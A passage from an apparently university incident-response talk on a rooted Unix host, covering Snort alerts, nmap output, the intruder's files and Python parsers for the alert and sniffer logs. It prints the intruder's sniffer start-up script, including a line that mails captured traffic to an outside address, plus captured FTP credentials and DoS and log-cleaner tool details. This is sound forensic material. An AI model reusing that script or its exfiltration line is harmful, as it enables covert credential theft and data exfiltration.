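    r"\[Classification: (?P<cls>[^\]]*)\] \[Priority: (?P<prio>\d+)\]: "
    r"\{(?P<proto>\w+)\} (?P<src>[\w.]+):(?P<sport>\d+) -> (?P<dst>[\w.]+):(?P<dport>\d+)$"
)


def parse_snort_syslog(text: str) -> List[dict]:
    """One dict per alert line; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = SNORT_LINE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def likely_compromises(events: List[dict]) -> List[Tuple[str, str, str]]:
    """(victim, attacker, exploit message) where an EXPLOIT alert aimed at a host is
    matched by an 'id check returned root' response from that host to the same peer.
    Time order is not required: on the slide the two alerts came from different sensors."""
    exploits: Dict[Tuple[str, str], str] = {}
    for e in events:
        if e["msg"].startswith("EXPLOIT"):
            exploits[(e["dst"], e["src"])] = e["msg"]  # keyed (victim, attacker)
    found = []
    for e in events:
        if e["msg"].startswith("ATTACK RESPONSES id check returned root"):
            key = (e["src"], e["dst"])  # the victim answers back to the attacker
            if key in exploits:
                found.append((key[0], key[1], exploits[key]))
    return found


def ddos_sources(events: List[dict], min_sources: int = 3) -> Dict[str, List[str]]:
    """Destination -> sorted sources for DDOS signatures seen from at least min_sources
    distinct hosts; every source listed is a host to take off the network and examine."""
    by_dst: Dict[str, set] = defaultdict(set)
    for e in events:
        if e["msg"].startswith("DDOS"):
            by_dst[e["dst"]].add(e["src"])
    return {dst: sorted(srcs) for dst, srcs in by_dst.items() if len(srcs) >= min_sources}
```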

Analyzing the Results: Unix

#(1 - 260297) [2002-06-25 01:51:43] [arachNIDS/05] SCAN nmap fingerprint attempt

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(2 - 251812) [2002-06-25 00:46:39] [arachNIDS/28] SCAN nmap TCP

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36455 -> dport: 7 flags=***A**** seq=1927116476

#(2 - 251813) [2002-06-25 00:47:07] [arachNIDS/05] SCAN nmap fingerprint attempt

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(3 - 259687) [2002-06-25 06:23:10] [arachNIDS/28] SCAN nmap TCP

IPv4: 212.41.197.9 -> MY.SUB.NET.55

TCP: port=36457 -> dport: 1 flags=***A**** seq=1927116476

Analyzing the Results: Unix

#(5 - 254473) [2002-06-25 04:26:55] [Bugtraq/2347] [CVE/CVE-2001-0144] EXPLOIT ssh CRC32 overflow /bin/sh

IPv4: 62.211.128.72 -> MY.SUB.NET.55

hlen=5 TOS=48 dlen=473 ID=58947 flags=0 offset=0 TTL=46 chksum=43204

TCP: port=1527 -> dport: 22 flags=***AP*** seq=1074100681

ack=3278036958 off=8 res=0 win=16060 urp=0 chksum=62278

Options:

#1 - NOP len=0

#2 - NOP len=0

#3 - TS len=10 data=02AD419900648C52

Payload: length = 421

Analyzing the Results: Unix

#(3 - 260901) [2002-06-25 18:35:41] ATTACK RESPONSES id check returned root

IPv4: 206.252.192.195 -> MY.SUB.NET.55

hlen=5 TOS=0 dlen=1500 ID=64118 flags=0 offset=0 TTL=53 chksum=47327

TCP: port=6667 -> dport: 32885 flags=***A**** seq=3486885204

ack=1549233503 off=5 res=0 win=8610 urp=0 chksum=45928

Payload: length = 1460

<snip>

510 : 6E 65 74 20 4B 6F 62 65 7C 65 73 5A 7C 20 48 40 net Kobe|esZ| H@

520 : 20 3A 30 20 75 69 64 3D 30 28 72 6F 6F 74 29 20 :0 uid=0(root)

530 : 67 69 64 3D 30 28 72 6F 6F 74 29 0D 0A 3A 69 72 gid=0(root)..:ir

540 : 63 2D 31 2E 73 74 65 61 6C 74 68 2E 6E 65 74 20 c-1.stealth.net

550 : 33 35 32 20 4D 6F 6E 69 6E 6F 20 23 69 67 6E 6F 352 Monino #igno

560 : 74 6F 20 7E 69 72 63 6E 65 74 20 32 31 33 2D 31 to ~ircnet 213-1

570 : 34 30 2D 31 32 2D 32 31 38 2E 66 61 73 74 72 65 40-12-218.fastre

580 : 73 2E 6E 65 74 20 2A 2E 65 64 69 73 6F 6E 74 65 s.net *.edisonte

<snip>

Analyzing the Results: Unix

bash-2.05# nmap -sS -p1-65535 MY.SUB.NET.55

Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap/ )

Interesting ports on marcia.geo.brown.edu (MY.SUB.NET.55):

(The 65491 ports scanned but not shown below are in state: closed)

Port State Service

<Snip>

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

<Snip>

8888/tcp open sun-answerbook

9010/tcp open unknown

22273/tcp open wnn6

25000/tcp open unknown

32771/tcp open sometimes-rpc5

<Snip>

Analyzing the Results: Unix

bash-2.05#telnet MY.SUB.NET.55 25000

Trying MY.SUB.NET.55...

Connected to MY.SUB.NET.55.

Escape character is '^]'.

SSH-1.5-1.2.25

^]

Analyzing the Results: Unix

  • /dev/pts/01

    • Rootkit

  • /dev/prom

    • sn.l

    • dos

  • /usr/lib

    • ldlibnet.so

    • lpstart

    • lpset

Analyzing the Results: Unix

lpstart:

set EMAIL_ADDRESS angelz1578@usa.net

touch /dev/prom/sn.l

#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null

echo "Restart on `date`" >>/dev/prom/sn.l

if test -f /dev/prom/dos ;then

cd /usr/lib

./lpq

fi

nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null &

Analyzing the Results: Unix

Contents of /dev/prom/sn.l:

-- TCP/IP LOG -- TM: Tue Jun 25 06:31:17 --

PATH: 163.178.101.249(ftp) => marcia(ftp)

STAT: Tue Jun 25 06:31:17, 2 pkts, 0 bytes [TH_RST]

DATA:

--

-- TCP/IP LOG -- TM: Tue Jun 25 08:16:38 --

PATH: roc-24-24-47-93.rochester.rr.com(ftp) => marcia(ftp)

STAT: Tue Jun 25 08:16:39, 2 pkts, 0 bytes [TH_RST]

DATA:

--

Analyzing the Results: Unix

-- TCP/IP LOG -- TM: Tue Jun 25 05:54:50 --

PATH: hackedsystem(32873) => hacker.ftpsite.com(ftp)

STAT: Tue Jun 25 05:55:50, 33 pkts, 232 bytes [TH_FIN]

: DATA: USER reiregna

: PASS assamalaka

: CWD images

: PORT MY,SUB,NET,55,128,106

: RETR sunpsy.tgz

: PORT MY,SUB,NET,55,128,107

: NLST -al

: PORT MY,SUB,NET,55,128,108

: RETR sun.tgz

: TYPE I

: PORT MY,SUB,NET,55,128,109

: RETR sunpsy.tgz

: QUIT
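The sniffer output on these two slides has a fixed layout: a "-- TCP/IP LOG --" header with the start time, a PATH line with both endpoints, a STAT line with the packet and byte counts, then the captured bytes (each line prefixed with a colon) until a lone "--". The following added example (not from the talk) parses that layout so a handler can list every account whose login was captured, and so must be reset during recovery, and every file pulled over FTP through the box. The sample is two of the three sessions shown on the slides, with the FTP session shortened to its USER/PASS/CWD/PORT/RETR/QUIT lines.

```python
import re
from typing import List, Tuple

# Constructed sample: two of the three /dev/prom/sn.l sessions shown on these slides;
# the FTP session is shortened to its USER/PASS/CWD/PORT/RETR/QUIT lines.
SNIFFER_LOG = """\
-- TCP/IP LOG -- TM: Tue Jun 25 06:31:17 --
PATH: 163.178.101.249(ftp) => marcia(ftp)
STAT: Tue Jun 25 06:31:17, 2 pkts, 0 bytes [TH_RST]
DATA:
--
-- TCP/IP LOG -- TM: Tue Jun 25 05:54:50 --
PATH: hackedsystem(32873) => hacker.ftpsite.com(ftp)
STAT: Tue Jun 25 05:55:50, 33 pkts, 232 bytes [TH_FIN]
: DATA: USER reiregna
: PASS assamalaka
: CWD images
: PORT MY,SUB,NET,55,128,106
: RETR sunpsy.tgz
: PORT MY,SUB,NET,55,128,108
: RETR sun.tgz
: QUIT
--
"""

HEADER = re.compile(r"^-- TCP/IP LOG -- TM: (.+?) --$")
PATH = re.compile(r"^PATH: (\S+)\((\S+)\) => (\S+)\((\S+)\)$")
STAT = re.compile(r"^STAT: (.+?), (\d+) pkts, (\d+) bytes \[(\w+)\]$")


def parse_sniffer_log(text: str) -> List[dict]:
    """One dict per '-- TCP/IP LOG --' block: endpoints, counts and captured lines."""
    sessions: List[dict] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            cur = {"started": m.group(1), "src_host": "", "src_port": "", "dst_host": "",
                   "dst_port": "", "pkts": 0, "nbytes": 0, "data": []}
            sessions.append(cur)
            continue
        if cur is None or line == "--":
            continue
        m = PATH.match(line)
        if m:
            cur["src_host"], cur["src_port"], cur["dst_host"], cur["dst_port"] = m.groups()
            continue
        m = STAT.match(line)
        if m:
            cur["pkts"], cur["nbytes"] = int(m.group(2)), int(m.group(3))
            continue
        # Captured bytes: the first item may follow "DATA:", later ones carry a ": " prefix
        if line.startswith(":"):
            line = line[1:].strip()
        if line.startswith("DATA:"):
            line = line[5:].strip()
        if line:
            cur["data"].append(line)
    return sessions


def captured_logins(sessions: List[dict]) -> List[Tuple[str, str, str, str, bool]]:
    """(src host, dst host, dst service, username, password seen); the password itself is not returned."""
    found = []
    for s in sessions:
        user, saw_pass = None, False
        for item in s["data"]:
            verb, _, arg = item.partition(" ")
            if verb.upper() == "USER":
                user = arg.strip()
            elif verb.upper() == "PASS" and user is not None:
                saw_pass = True
        if user:
            found.append((s["src_host"], s["dst_host"], s["dst_port"], user, saw_pass))
    return found


def retrieved_files(sessions: List[dict]) -> List[Tuple[str, str]]:
    """(dst host, filename) for every RETR, i.e. what was pulled through the box."""
    return [(s["dst_host"], item.split(None, 1)[1]) for s in sessions
            for item in s["data"] if item.upper().startswith("RETR ")]
```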

Analyzing the Results: Unix

  • Looks like lpset is a sniffer:

    # strings lpset

    rlogin

    telnet

    smtp

    -- TCP/IP LOG -- TM: %s --

    PATH: %s(%s) =>

    %s(%s)

    STAT: %s, %d pkts, %d bytes [%s]

    DATA:

Analyzing the Results: Unix

  • Looks like lpq is a DoS tool:

    %d.%d.%d.%d

    Usage: %s <dst> <src> <size> <number>

    dst: Destination Address

    src: Source Address

    size: Size of packet which should be no larger than

    1024 should allow for xtra header info thru routes

    num: packets

Analyzing the Results: Unix

  • It's running SSH on port 25000 as well:

    #more sshd_config

    <snip>

    Port 25000

    ListenAddress 0.0.0.0

    <snip>


Analyzing the Results: Unix

  • Log Cleaner too:

    #!/bin/sh

    #

    # Generic log cleaner v0.4 By: Tragedy/Dor (dor@kaapeli.net) Based

    # on sauber..

    #

    # This is TOTALLY incomplete... I never added support for IRIX or

    # SunOS...And.. i most likely never will.. And i take no responsibility for

    # any use/misuse of this tool..

    #

    # Notes-0.3

    # SunOS support added.. had to rewrite most of it :P

    # Notes-0.4

    # Beta IRIX support added and enabled...

Analyzing the Results: Unix

  • Headlines read:

    “Italian police arrest 14 in hacker probe”

    http://news.com.com/2100-1001-948179.html

  • Coordinate with local authorities:

    • Secret Service contact

    • Especially where losses occur

Recovery

  • 99% of the time format and re-install or restore from tape

  • Have good backups

  • Does not come back on the network until it's clean

  • Change all passwords

Lessons Learned

  • The CIRT Report

    • What happened?

    • How did it happen?

    • Was data lost or stolen?

    • How can we prevent this?

    • What can CIRT do better?

Contact Info

  • Paul_Asadoorian@brown.edu

  • Sharing Snort Rules – Securely

  • CIRT – http://www.brown.edu/Facilities/CIS/CIRT/

  • SysAdmins – http://www.brown.edu/Research/SysAdmins/
